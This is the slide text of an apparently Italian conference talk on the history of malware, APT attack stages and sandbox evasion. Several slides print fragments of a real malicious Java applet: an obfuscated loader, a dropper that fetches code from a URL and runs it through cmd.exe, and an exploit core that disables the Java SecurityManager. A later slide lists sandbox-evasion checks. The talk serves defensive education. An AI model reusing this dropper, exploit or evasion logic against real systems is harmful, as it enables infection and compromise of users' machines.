  • 2. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  • 3. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Come si sviluppa un attacco? <#1> <#2> <#3>
  • 4. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <1996> The Dark Side of the Moon http://vx.org.ua/29a/main.html
  • 5. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines <2000> 8,7 miliardi di dollari
  • 6. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2001> The Nimda Style Microsoft IIS e PWS Extended Unicode Directory transversalVulnerability Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability Microsoft IE MIME Header Attachment Execution VulnerabilityTFTP Server UDP:69 RICHED20.DLL Microsoft Office 2000 DLL Execution Vulnerability Microsoft IE MIME Header Attachment Execution Vulnerability 635 milioni di dollari
  • 7. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com SQL Server 2000 Desktop Engine 75.000 computer infettati in soli 10 minuti payload di soli 376 byte (residente esclusivamente in memoria) 1,2 miliardi di dollari
  • 8. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com 22,6 miliardi di dollari DDOS contro www.sco.com Upload&Execute0x85 0x13 0x3c 0x9e 0xa2 Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
  • 9. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2010-2012> Government in Action > Stuxnet (2010) > Duqu (2011) > Flame (2012) > Gauss (2012) http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/ ShoppingFor Zero-Days
  • 10. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il Malware più complesso della storia > 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati) > 80 domini utilizzati come sistemi di Comando e Controllo > Diffusione via USB Stick (Infectmedia) > Enumerazione dei dispositivi Bluetooth (Beetlejuice) > Registrazione audio (Microbe) > Windows Update MITM (Munch & Gadget) MD5 Collision Attack
  • 11. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <2007> Storm Worm & CyberCrime Market http://www.pcworld.com/article/138694/article.html
  • 12. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/ « »
  • 13. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Advanced Persistent Threats 101 > Trust Exploitation Social Engineering Spear Phishing Botnet Drive-to-Click Strategy
  • 14. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation Exploit Pack (e.g.Neutrino) 0-Day Advanced Persistent Threats 101
  • 15. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage Shellcoding Dropper/Downloader Modules(e.g.RAT, Infostealer,etc.) Good Covert Channel Advanced Persistent Threats 101
  • 16. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector Email WebSites Botnet Physical (USB) Advanced Persistent Threats 101
  • 17. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com > Trust Exploitation > Client Exploitation > Multi-Stage > Multi-Vector > Resiliency Camouflaging Command &Control Good Covert Channel Advanced Persistent Threats 101
  • 18. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Make or Buy?
  • 19. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Botnet Choice
  • 20. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#1>
  • 21. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#2>
  • 22. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#3>
  • 23. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#4>
  • 24. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Drive-to-Click <#5>
  • 25. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#1> Giochiamo con le estensioni RLO Unicode control character
  • 26. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Trick#2> Content-Disposition Nightmare http://www.gnucitizen.org/blog/content-disposition-hacking/ Download Server Response Headers RFC 2616
  • 27. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <applet codebase=“http://blahblah.evilsite.in/hiddenpath/" archive=“http://blahblah.othersite.in/hiddenpath/ c8c34734f41cca863a972129369060d9” code=“rgmiv”> Trick#3> Client Exploiting
  • 28. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com public class xp extends JApplet { public void init() { try { Object aobj[] = new Object[0]; Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1); String s = "hpjwbludyi"; s = "wgpxrwyvzolbb"; s = "zdfmvftloqmakqysyu"; s = "nrrkqnjfylgtljyyferr"; cr.hzumfnc(obj); Object aobj1[] = new Object[0]; String s1 = "ofvszonrzgelnko"; s1 = "fefhtspcqhj"; s1 = "evztavmzjarjgwu"; Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] { Integer.TYPE }).newInstance(new Object[] { Integer.valueOf(tcbteokd.mdrikbua(9)) }); int ai[] = new int[8]; Object aobj2[] = new Object[7]; aobj2[2] = cr.hzumfnc(obj); ...
  • 29. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> XOR String Encryption public static String ok = ha.n("1:-:u:,/u26:<>ub:6+7>0264?>7"); ... public static String n(String s) { String s1 = ""; for (int i = 0; i < s.length(); i++) s1 += idzfihff(s.charAt(i)); return s1; } ... public static char idzfihff(char c) { return (char)(c ^ 0x5b); } https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  • 30. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <02> Java Reflection public static Class fuss(String s) throws Exception { return Class.forName(s); } ... public static Object dngfuv(Method method, Object obj, Object aobj[]) { return method.invoke(obj, aobj); } public static Constructor bjixqh(Class class1, Class aclass[]) { return class1.getConstructor(aclass); } ... https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf Malware
  • 31. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <03> ClassLoader Override class t extends ClassLoader { public static void ujrzjw(t t1, String s) { try { Class class1 = t1.defineClass("qbw", tcbteokd.xcpoalaefqfvuacylvakyi, 0, tcbteokd.xcpoalaefqfvuacylvakyi.length); ygigtele.bjixqh(class1, new Class[] { tcbteokd.fuss("java.lang.String") }).newInstance(new Object[] { s }); } catch (Exception ex) { System.exit(0); } } } Malware
  • 32. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com ... private static void lcsqyrgtbct (String s, int i) { String s1 = s + Integer.valueOf(i); ... rchannel= Channels.newChannel((new URL(s1)).openStream()); ... File file = File.createTempFile("~tmf", null); FileOutputStream fos= new FileOutputStream(file); for (int j = 0; j < abyte0.length; j++) abyte0[j] = (byte)(abyte0[j] ^ 0x29); fos.write(abyte0); if (abyte0.length > 1024) try { Runtime.getRuntime().exec(new String[] { "cmd.exe", "/C", file.getAbsolutePath() }); } catch (IOException ioe) { (new ProcessBuilder(new String[] { file.getAbsolutePath() })).start(); } The Dropper Class
  • 33. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Object obj1 = new java.awt.image.DataBufferByte(9); int[] ai = new int[8]; Object[] oo = new Object[7]; oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]); ... DataBufferByte obj5 = new DataBufferByte(8); for (int j = 0; j < 8; j++) obj5.setElem(j, -1); MultiPixelPackedSampleModel obj6 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0); Raster obj7 = Raster.createWritableRaster(obj6, obj5, null); MultiPixelPackedSampleModel obj8 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1, 0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0)); Raster obj9 = Raster.createWritableRaster(obj8, obj1, null); byte obj10 = new byte[] {0, -1} IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10); CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null); obj12.compose(obj7, obj9, obj9); The Malware Core http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
  • 34. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Cheaper Path to Exploiting Blackole Exploit Kit http://en.wikipedia.org/wiki/Blackhole_exploit_kit Styx Exploit Pack http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto Neutrino http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more- exploit-kit.html RedKit http://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html
  • 35. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The InfoStealer Choice
  • 36. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The RAT Choice
  • 37. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Bitcoin + APT = Ransomware
  • 38. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#1>
  • 39. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#2>
  • 40. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#3>
  • 41. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Command&Control Choice <#4>
  • 42. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose” MikkoHypponen(F-Secure) <2012> The Antivirus Maker Confession
  • 43. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com The Way to Sandboxing
  • 44. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com <01> USER-MODE AGENT Softwarecomponent inaguest operating system (keylogger) <02> KERNEL-MODE PATCHING Guestoperating system Kernelmodified fortracing (rootkit) <03> VIRTUAL MACHINE MONITORING Customized Hypervisor to monitor the guest operatingsystem <04> SYSTEM EMULATION Hardwareemulator to hookappropriate memory, IO functions,peripherals, etc. <05> KERNEL EMULATION Kernelemulator tohookappropriate system calls, etc. The Way to Sandboxing
  • 45. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (molto) parziale dei Player > Norman Sandbox (Norway2001) > FireEye (US2004) > Damballa (US2006) > Lastline/Anubis/Wepawet (Austria 2006) > Sandboxie (2006) > Cuckoo Sandbox (2010) > VMRay formerly CWSandbox (Germany 2007) > Joe Security LLC (Switzerland 2007) > BitBlaze (2008) > ThreatExpert (Ireland 2008) > Ether (US 2009)
  • 46. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com
  • 47. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Una lista (completamente) parziale degli Evader
  • 48. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012) > MessageBox (Something thatneed to be clicked) > Sleep Calls (Trojan Nap, uncoveredin February2013) > Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea) > Check Internet Connection > Check Volume information and Size > Check self Executable name > Execution after reboot > Check System services, files and communication ports
  • 49. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Il limite delle Sandbox Minuti def: il Paziente Zero è il primo paziente individuato nel campione della popolazione di un'indagine epidemiologica…
  • 50. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Sicuramente meglio che confidare negli utenti
  • 51. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian